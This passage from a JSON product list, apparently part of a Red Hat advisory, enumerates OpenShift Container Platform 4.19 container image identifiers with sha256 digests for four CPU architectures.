"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
